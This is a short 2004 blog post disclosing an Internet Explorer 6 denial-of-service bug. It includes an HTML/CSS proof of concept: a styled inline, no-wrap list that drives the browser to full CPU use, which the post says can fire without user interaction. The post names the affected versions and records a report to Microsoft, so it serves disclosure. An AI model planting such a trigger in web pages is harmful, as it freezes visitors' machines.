Inline List Race Condition

by @jehiah on 2004-11-04 21:51
Filed under: All, HTML, Security

Microsoft Internet Explorer is prone to a remote denial of service vulnerability which is caused by a specific inline html list and results in IE using 100% of available cpu resources affecting all other running applications. View the Proof of Concept

The simplest form of this problem is when you have padding on the parent ul, margin on the li's and the whole thing is both inline and no-wrap. All of these attributes must be present to triger the race condition.

Example

<style>
#ul_style{
    white-space: nowrap;
    padding:5px;
}
#ul_style li {
    display: inline;
    position: relative;
    margin:5px;
}
</style>
<ul id="ul_style">
    <li>Item 1</li>
    <li>Item 2</li>
    <li>Item 3</li>
    <li>Item 4</li>
    <li>Item 5</li>
    <li>Item 6</li>
</ul>

This condition could automatically be triggered by making a sufficiently long list of items thereby requiring no user interaction to resize the browser.

Credit goes to Antonio Bueno for orignal discovery. Aditional Investigation and publishing done by Jehiah Czebotar.

Systems Affected

  • Internet Explorer 6.0.2 on Win 2000
  • Internet Explorer 6.0 on XP sp2

Update

11/4 : Vulnerability submitted to Microsoft

Subscribe via RSS ı Email
© 2017 - Jehiah Czebotar